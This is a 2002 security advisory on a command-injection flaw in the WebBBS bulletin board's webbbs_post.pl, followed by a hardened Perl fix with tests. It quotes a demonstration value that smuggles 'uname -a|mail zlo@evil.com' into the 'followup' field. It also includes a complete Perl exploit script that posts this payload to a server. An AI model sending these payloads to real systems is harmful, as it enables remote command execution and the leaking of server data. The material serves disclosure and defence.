SecurityTracker.com
Category:   Application (Forum/Board/Portal)  >   WebBBS
Vendors:   Burgdorf, Darryl
WebBBS Bulletin Board Input Validation Flaw in 'webbbs_post.pl' Allows Remote Users to Execute Arbitrary System Commands
SecurityTracker Alert ID:  1004568
SecurityTracker URL:  http://securitytracker.com/id/1004568
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jun 18 2002
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 5.0
Description:   An input validation vulnerability was reported in the WebBBS bulletin board software. A remote user can execute arbitrary commands on the system with the privileges of the web server.

Nerf gr0up reported that the vulnerability exists in the 'webbbs_post.pl' script where no input filtering is performed on the '$followup' variable.

A remote user can submit a URL that modifies the contents of the $followup variable to include system commands.

A demonstration exploit value is provided:

followup=10;uname -a|mail zlo@evil.com|

A demonstration exploit script is provided in the Source Message.

Impact:   A remote user can execute system commands on the server with the privileges of the web server.
Solution:   No solution was available at the time of this entry.
Vendor URL:  awsd.com/scripts/webbbs/
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Underlying OS Comments:  Perl-based

Message History:   None.


 Source Message Contents

Subject:  WebBBS 5.0 (and later versions) vulnerable: allow commands




             	--== Nerf gr0up: adv #7 ==--  
 		     WebBBS remote command execution

Vulnerable:
WebBBS by Darryl Burgdorf 
(http://awsd.com/scripts/webbbs/).
All versions are vulnerable.
WebBBS is a Web-based bulletin board. WebBBS stores 
messages as simple text files.

Description:
WebBBS script allows command execution on server.
This script does no filtering and due to this
remote command execution is possible.

The vulnerable code is shown below:
-----
webbbs_post.pl: 

...
if ($FORM{'followup'}) { $followup = "$FORM{'followup'}"; }
...
if ($followup) {
...
		$subdir = "bbs".int($followup/1000);
		open (FOLLOWUP,"$dir/$subdir/$followup");
...
-----

Just change the value of $followup variable, e.g "followup=10" to
"followup=10;uname -a|mail zlo@evil.com|" to exploit this vulnerability.

btr
nerf
www.nerf.ru

Attach (exploit in perl):

#!/usr/bin/perl
#
#  nerF gr0up
#
#  exploit code for
#  WebBBS by Darryl C. Burgdorf
#  all version up to 5.00 are vulnerable
#
#
#  this is an exploitation of "followup" bug.
#  it allows remote attacker to execute shell commands.
#  you can find WebBBS script at http://awsd.com/scripts/webbbs/
#
#  06.06.2002
#  btr // nerf
# nerf.ru

use IO::Socket;

        srand();
        $script = "/cgi-bin/webbbs/webbbs_config.pl";
        $command = "uname -a|mail zlo@evil.com";
        $host = "localhost";
        $port = 80;

        $content = "$content" . "name=" . rand(254);
        $content = "$content" . "&email=" . rand(254);
        $content = "$content" . "&subject=" . rand(254);
        $content = "$content" . "&body=" . rand(254);
        $content="$content"."&followup=".rand(254)."|$command|";

        $content_length = length($content);
        $content_type = "application/x-www-form-urlencoded";

        if (@ARGV[0]) {$command=@ARGV[0];}
        if (@ARGV[1]) {$host=@ARGV[1];}
        if (@ARGV[2]) {$script=@ARGV[2];}

        $buf = "POST " . "$script" . "?post HTTP/1.0\n";
        $buf = "$buf" . "Content-Type: $content_type\r\nContent-Length:";
        $buf = "$buf" . "$content_length\r\n\r\n$content", 0;

	print "\tnerF gr0up\n";
	print "exploit: WebBBS (awsd.com), version up to 5.00\n";

        print "sent:\n$buf\n";

if($socket = IO::Socket::INET->new("$host:$port")){

        print $socket "$buf";
        read($socket,$buf,1500);
        print "recieved:\n$buf\n";
}
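
A hardened form of the $followup handling quoted from webbbs_post.pl above, as an added example that is not WebBBS code or a vendor fix: it accepts only a numeric message id and uses three-argument open, so the value is never parsed for a trailing '|'. The sub names, the id format and the scratch directory are assumptions made for the illustration.

```perl
#!/usr/bin/perl
# Added example, not WebBBS source: validate 'followup', then open it safely.
use strict;
use warnings;
use File::Temp qw(tempdir);

# Assumption: message ids are positive decimal integers (the quoted snippet
# computes int($followup/1000), so only numbers are meaningful there).
sub parse_followup {
    my ($raw) = @_;
    return undef unless defined $raw;
    # \A and \z anchor the whole string; a bare '$' would allow a trailing "\n".
    return $raw =~ /\A([1-9][0-9]{0,8})\z/ ? $1 : undef;
}

# Returns (filehandle, undef) on success or (undef, reason) on failure.
sub open_followup {
    my ($dir, $raw) = @_;
    my $id = parse_followup($raw);
    return (undef, "rejected: not a message id") unless defined $id;
    my $path = sprintf "%s/bbs%d/%d", $dir, int($id / 1000), $id;
    # Three-argument open with an explicit '<' mode: Perl treats $path purely
    # as a file name and never interprets '|' or '>' in it as a pipe or mode.
    open(my $fh, '<', $path) or return (undef, "no such message: $!");
    return ($fh, undef);
}

# Constructed test data: a scratch directory holding one message, id 10.
my $dir = tempdir(CLEANUP => 1);
mkdir "$dir/bbs0" or die "mkdir: $!";
open(my $out, '>', "$dir/bbs0/10") or die "create: $!";
print {$out} "constructed message body\n";
close $out;

# Constructed inputs: a valid id, the advisory's demonstration value, and
# other malformed values a form field could carry.
my @inputs = ('10', '10;uname -a|mail zlo@evil.com|', "10\n", '../10', '11', '');
for my $raw (@inputs) {
    my ($fh, $err) = open_followup($dir, $raw);
    (my $shown = $raw) =~ s/\n/\\n/g;
    printf "%-34s %s\n", "'$shown'", $fh ? "opened" : $err;
    close $fh if $fh;
}
```

Only '10' is opened; '11' passes validation but has no file, and every other value is rejected before a path is built.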



 
 

